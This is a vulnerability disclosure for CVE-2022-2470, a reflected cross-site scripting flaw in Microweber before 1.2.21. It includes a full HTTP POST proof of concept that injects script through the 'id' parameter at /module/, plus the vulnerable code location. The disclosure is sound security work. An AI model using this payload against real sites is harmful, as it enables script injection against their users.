Headline
CVE-2022-2470: Cross-site Scripting (XSS) - Reflected in microweber
Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.21.
Description
Hi team, I found XSS at /module/.
Proof of Concept
Pop up POC:
Reflected POC:
Full request payload:
POST /demo/module/ HTTP/1.1
Host: demo.microweber.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 183
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/shop
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers
Connection: close
type=shop%2Fcheckout&template=modal&id=js-ajax-cart');});function%20$(num1){alert(1);return%20String(num1)}$(document).ready(function%20()%20{mw.$('-checkout-process&class=no-settings
Impact
XSS
Occurrences
index.php L80-L92
This function does not filter ‘id’ parameter in script tag, which allows attackers to escape syntax using apostrophe.
Related news
GHSA-cfcg-2qgr-v243: Microweber before 1.2.21 vulnerable to reflected XSS
Microweber prior to 1.2.21 is vulnerable to reflected cross-site scripting (XSS).